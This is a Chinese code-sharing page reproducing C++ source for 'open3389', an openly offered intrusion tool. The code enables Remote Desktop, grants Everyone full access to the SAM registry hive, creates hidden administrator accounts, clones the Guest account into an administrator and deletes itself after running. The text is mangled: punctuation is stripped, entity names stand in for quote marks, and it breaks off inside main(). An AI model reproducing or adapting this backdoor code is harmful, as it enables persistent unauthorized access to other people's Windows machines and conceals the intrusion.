【ACCESS精品源码栏目提醒】:本文主要为网学会员提供“【精品】开3389源代码 - 文化”,希望对需要【精品】开3389源代码 - 文化网友有所帮助,学习一下!
// open3389.cpp : Defines the entry point for the console application.//include quotstdafx.hquotinclude ltstdio.hgtinclude ltwindows.hgtinclude quotRegistry.hquot//include quotCloneSID.hquotinclude quotFindPass.hquotinclude ltAclapi.hgtinclude ltlm.hgtpragma commentlibquotnetapi32.libquotvoid Open3389DWORD port CRegistry reg reg.OpenquotSOFTWAREMicrosoftWindowsCurrentVersion0quot reg.CreateKeyquotnetcachequot reg.WriteStringquotEnabledquotquot0quot reg.OpenquotSOFTWAREPoliciesMicrosoftWindows0quot reg.CreateKeyquotInstallerquot reg.WriteDwordquotEnableAdminTSRemotequot1 if reg.OpenquotSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon0quot reg.WriteStringquotShutdownWithoutLogonquotquot0quot if reg.OpenquotSYSTEMCurrentControlSetControlTerminal Server0quot reg.WriteDwordquotTSEnabledquot1 if reg.OpenquotSYSTEMCurrentControlSetServicesTermDD0quot reg.WriteDwordquotStartquot2 if reg.OpenquotSYSTEMCurrentControlSetServicesTermService0quot reg.WriteDwordquotStartquot2 if reg.OpenquotSYSTEMCurrentControlSetControlTerminal Server0quot reg.WriteDwordquotfDenyTSConnectionsquot0 if reg.OpenquotSYSTEMCurrentControlSetControlTerminalServerRDPTcp0quot reg.WriteDwordquotPortNumberquotport if reg.OpenquotSYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-Tcp0quot reg.WriteDwordquotPortNumberquotport if reg.OpenquotSYSTEMCurrentControlSetControlTerminalServerWdsrdpwdTdstcp0quot reg.WriteDwordquotPortNumberquotport reg.ReSetMainKeyHKEY_USERS if reg.Openquot.DEFAULTKeyboard LayoutToggle0quot reg.WriteStringquotHotkeyquotquot2quot reg.Closevoid ResetTermsPortDWORD port CRegistry reg if reg.OpenquotSYSTEMCurrentControlSetControlTerminalServerRDPTcp0quot reg.WriteDwordquotPortNumberquotport if reg.OpenquotSYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-Tcp0quot reg.WriteDwordquotPortNumberquotport if reg.OpenquotSYSTEMCurrentControlSetControlTerminalServerWdsrdpwdTdstcp0quot reg.WriteDwordquotPortNumberquotportchar GetUserSIDTCHAR user HKEY hKey DWORD dwValue char ret NULL char strType32 DWORD dwRegType TCHAR lpSubKey128 wsprintflpSubKeyquotSAMSAMDomainsAccountUsersNamessquotuser if0RegOpenKeyHKEY_LOCAL_MACHINElpSubKey amphKey DWORD dwLensizeofDWORD RegQueryValueExhKeyquotquotNULLampdwRegTypeBYTEampdwValue ampdwLen RegCloseKeyhKey wsprintfstrTypequot-20st-SID-gt08XquotuserdwRegType ret strType else ret quotNULLquot return retBOOL GetSecurity DWORD dwRet LPSTR SamName quotMACHINESAMSAMquot PSECURITY_DESCRIPTOR pSD NULL PACL pOldDacl NULL PACL pNewDacl NULL EXPLICIT_ACCESS ea HKEY hKey NULL dwRet GetNamedSecurityInfoSamName SE_REGISTRY_KEYDACL_SECURITY_INFORMATION NULL NULL amppOldDacl NULL amppSD if dwRet ERROR_SUCCESS return FALSE ZeroMemoryampea sizeofEXPLICIT_ACCESS BuildExplicitAccessWithNameampea quotEveryonequot KEY_ALL_ACCESS SET_ACCESS SUB_CONTAINERS_AND_OBJECTS_INHERIT dwRet SetEntriesInAcl1 ampea pOldDacl amppNewDacl if dwRet ERROR_SUCCESS return FALSE dwRet SetNamedSecurityInfoSamName SE_REGISTRY_KEYDACL_SECURITY_INFORMATION NULL NULL pNewDacl NULL if dwRet ERROR_SUCCESS return FALSE if pNewDacl LocalFreepNewDacl if pSD LocalFreepSD return TRUE BOOL CreateHideUserchar userchar pass char ParamMAX_PATH wsprintfParamquot user s s /addquotuserpass HINSTANCE nRet ShellExecute0 quotopenquot quotnet.exequot Param NULL SW_HIDE ifintnRet lt 32 return FALSE printfquotCreate s Success...rnquotuser HKEY hKey DWORD dwValue char strType32 DWORD dwRegType TCHAR lpSubKey128 wsprintflpSubKeyquotSAMSAMDomainsAccountUsersNamessquotuser printfquotOpen s...rnquotlpSubKey int nCount 0 while1 if0RegOpenKeyHKEY_LOCAL_MACHINElpSubKey amphKey DWORD dwLensizeofDWORD RegQueryValueExhKeyquotquotNULLampdwRegTypeBYTEampdwValueampdwLen RegCloseKeyhKey wsprintfstrTypequot08XquotdwRegType printfquotGet Registry Value s...rnquotstrType break Sleep50 nCount ifnCount gt 100 return FALSE LPBYTE lpDataFlpDataV lpDataF LPBYTE malloc10242 lpDataV LPBYTE malloc102410 ZeroMemorylpDataF10242 ZeroMemorylpDataV102410 DWORD SizeF1024 2 DWORD SizeV1024 10 if0RegOpenKeyExHKEY_LOCAL_MACHINEquotSAMSAMDomainsAccountUsers000001F4quot 0KEY_ALL_ACCESSamphKey DWORD dwType REG_BINARY DWORD dwLensizeofDWORD RegQueryValueExhKeyquotFquotNULLampdwTypelpDataF ampSizeF RegCloseKeyhKey HKEY c_hKey TCHAR lpSubKey2128 wsprintflpSubKey2quotSAMSAMDomainsAccountUserssquotstrType printfquotOpen s...rnquotlpSubKey2 if0RegOpenKeyExHKEY_LOCAL_MACHINElpSubKey20KEY_ALL_ACCESSampc_hKey DWORD dwType REG_BINARY DWORD dwLensizeofDWORD RegQueryValueExc_hKeyquotVquotNULLampdwTypelpDataV ampSizeV RegCloseKeyc_hKey wsprintfParamquot user s /delquotuser nRet ShellExecute0 quotopenquot quotnet.exequot Param NULL SW_HIDE ifintnRet lt 32 return FALSE printfquotDelete s Success...rnquotuser nCount 0 while1 ifERROR_SUCCESSRegOpenKeyExHKEY_LOCAL_MACHINElpSubKey0KEY_ALL_ACCESSampc_hKey if RegCreateKeyHKEY_LOCAL_MACHINE lpSubKey amphKey ERROR_SUCCESS DWORD dwLensizeofDWORD DWORD dwValue NULL RegSetValueExhKeyquotquotNULLdwRegTypeNULL 0 RegCloseKeyc_hKey break RegCloseKeyc_hKey Sleep50 nCount ifnCount gt 100 return FALSE printfquotNow Create s Registry Key...quotuser if RegCreateKeyHKEY_LOCAL_MACHINE lpSubKey2 amphKey ERROR_SUCCESS DWORD dwLensizeofDWORD DWORD dwValue NULL RegSetValueExhKeyquotFquotNULLREG_BINARYlpDataF SizeF RegSetValueExhKeyquotVquotNULLREG_BINARYlpDataV SizeV RegCloseKeyhKey printfquotSuccessrnquot printfquotOKrnUSER: srnPASS: squotuserpass return TRUE BOOL DelSidchar sid HKEY hkey DWORD ret char C_sid10 if strncmpsidquot00000quotstrlenquot00000quot 0 wsprintfC_sidquotsquotsid else wsprintfC_sidquot00000squotsid retRegOpenKeyHKEY_LOCAL_MACHINEquotSAMSAMDomainsAccountUsersquotamphkey if retERROR_SUCCESS return FALSE retRegDeleteKeyhkeyC_sid RegCloseKeyhkey if retERROR_SUCCESS return TRUE else return FALSE BOOL DelUserchar user HKEY hkey DWORD ret char C_user40 wsprintfC_userquotsquotuser retRegOpenKeyHKEY_LOCAL_MACHINEquotSAMSAMDomainsAccountUsersNamesquotamphkey if retERROR_SUCCESS return FALSE retRegDeleteKeyhkeyC_user RegCloseKeyhkey if retERROR_SUCCESS return TRUE else return FALSE BOOL CloneID HKEY hkeyC_hkey DWORD TypeREG_BINARYSizeF10242SizeV102410ret char CloneSid100 LPBYTE lpDataF LPBYTE lpDataV lpDataF LPBYTE malloc10242 lpDataV LPBYTE malloc10242 ZeroMemorylpDataF10242 ZeroMemorylpDataV10242 wsprintfCloneSidquotSAMSAMDomainsAccountUsers000001F5quot retRegOpenKeyExHKEY_LOCAL_MACHINEquotSAMSAMDomainsAccountUsers000001F4quot0KEY_ALL_ACCESSamphkey ifretERROR_SUCCESS return FALSE ret RegQueryValueExhkeyquotFquotNULLampTypelpDataFampSizeF ifretERROR_SUCCESS return FALSE ret RegOpenKeyExHKEY_LOCAL_MACHINECloneSid0KEY_ALL_ACCESSampC_hkey ifretERROR_SUCCESS return FALSE ret RegSetValueExC_hkeyquotFquot0REG_BINARYlpDataFSizeF ifretERROR_SUCCESS printfquotClone User Successnquot else printfquotClone User FAILnquot return FALSE RegCloseKeyhkey RegCloseKeyC_hkey return TRUE char ListUser char Temp1024 0 char retbuf4096 0 LPUSER_INFO_3 pBuf NULL LPUSER_INFO_3 pTmpBuf DWORD i DWORD dwLevel 3 DWORD dwPrefMaxLen -1 DWORD dwEntriesRead 0 DWORD dwTotalEntries 0 DWORD dwResumeHandle 0 LPTSTR pszServerName NULL NET_API_STATUS nStatus sprintfTempquotrn-20st-16s-7srnrnquotquotUSERquotquotSIDquotquotDOMAINquot strcpyretbufTemp do nStatus NetUserEnumNULLdwLevelFILTER_NORMAL_ACCOUNTLPBYTEamppBufdwPrefMaxLenampdwEntriesReadampdwTotalEntriesampdwResumeHandle if nStatus NERR_Success nStatus ERROR_MORE_DATA if pTmpBuf pBuf NULL for i 0 i lt dwEntriesRead i if pTmpBuf NULL sprintfTempquotAn Access Violation Has Occurredrnquot strcatretbufTemp break sprintfTempquotSquot pTmpBuf-gtusri3_name strcatretbufGetUserSIDTemp switchpTmpBuf-gtusri3_priv case USER_PRIV_GUEST: sprintfTempquott-gt-7strnquotquotGuestquot break case USER_PRIV_USER: sprintfTempquott-gt-7strnquotquotUserquot break case USER_PRIV_ADMIN: sprintfTempquott-gt-10strnquotquotAdministratorquot break default: sprintfTempquott-gt-7strnquotquotUnknowquot break //for pTmpBuf strcatretbufTemp //if sprintfTempquotrnOK...rnquot else sprintfTempquotrnNetUserEnum Error: drnquotGetLastError strcatretbufTemp if pBuf NULL NetApiBufferFreepBuf pBuf NULL while nStatus ERROR_MORE_DATA if pBuf NULL NetApiBufferFreepBuf char ret retbuf return ret BOOL EnablePrivilegeLPTSTR privilege int success HANDLE token LUID luid TOKEN_PRIVILEGES tokenprivileges successOpenProcessTokenGetCurrentProcess TOKEN_ADJUST_PRIVILEGESTOKEN_QUERYamptoken if success return FALSE successLookupPrivilegeValue0privilegeampluid if success return FALSE tokenprivileges.PrivilegeCount1 tokenprivileges.Privileges0.AttributesSE_PRIVILEGE_ENABLED tokenprivileges.Privileges0.Luidluid successAdjustTokenPrivilegestokenfalseamptokenprivileges000 if success return FALSE else return TRUEvoid Usagechar argv printfquotrnt 多功能开 3389 工具 by 特南克斯rnrnquot printfquots 直接运行默认开 3389 端口并重起删除自身rnquotargv printfquots PORT 开启自定义终端端口,默认重起删除自身rnquotargv printfquots -l 列举系统用户rnquotargv printfquots -f Find Administrator Passrnquotargv printfquots -h/ 帮助信息与察看终端端口rnrnquotargv printfquots -r PORT 开终端并重起rnquotargv printfquots -n PORT 开终端不重起rnquotargv printfquots -s PORT 重新设置终端端口rnquotargv printfquots -a USER PASS 添加隐藏的管理员用户rnquotargv printfquots -d USER 删除用户rnquotargv printfquots -c PASS 把 GUEST 克隆成管理员用户rnrnquotargv printfquotrnt 察看终端端口rnquot CRegistry reg if reg.OpenquotSYSTEMCurrentControlSetControlTerminalServerRDPTcp0quot printfquot-30s drnquotquot终端端口:quotreg.ReadDwordquotPortNumberquot if reg.OpenquotSYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-Tcp0quot printfquot-30s drnquotquot终端端口:quotreg.ReadDwordquotPortNumberquot if reg.OpenquotSYSTEMCurrentControlSetControlTerminalServerWdsrdpwdTdstcp0quot printfquot-30s drnquotquot终端端口:quotreg.ReadDwordquotPortNumberquot BOOL DeleteMe TCHAR szModule MAX_PATH szComspecMAX_PATH szParams MAX_PATH // get file path names: ifGetModuleFileName0szModuleMAX_PATH0 ampamp GetShortPathNameszModuleszModuleMAX_PATH0 ampamp GetEnvironmentVariablequotCOMSPECquotszComspecMAX_PATH0 // set command shell parameters lstrcpyszParamsquot /c del quot lstrcatszParams szModule lstrcatszParams quot gt nulquot lstrcatszComspec szParams // set struct members STARTUPINFO si0 PROCESS_INFORMATION pi0 si.cb sizeofsi si.dwFlags STARTF_USESHOWWINDOW si.wShowWindow SW_HIDE // increase resource allocation to program SetPriorityClassGetCurrentProcess REALTIME_PRIORITY_CLASS SetThreadPriorityGetCurrentThread THREAD_PRIORITY_TIME_CRITICAL // invoke command shell ifCreateProcess0 szComspec 0 0 0CREATE_SUSPENDED DETACHED_PROCESS 0 0 ampsi amppi // suppress command shell process until program exits SetPriorityClasspi.hProcessIDLE_PRIORITY_CLASS SetThreadPrioritypi.hThreadTHREAD_PRIORITY_IDLE // resume shell process with new low priority ResumeThreadpi.hThread // everything seemed to work return TRUE else // if error normalize allocation SetPriorityClassGetCurrentProcess NORMAL_PRIORITY_CLASS SetThreadPriorityGetCurrentThread THREAD_PRIORITY_NORMAL return FALSEint mainint argc char argv if argc 1 Open3389DWORD3389 if argc.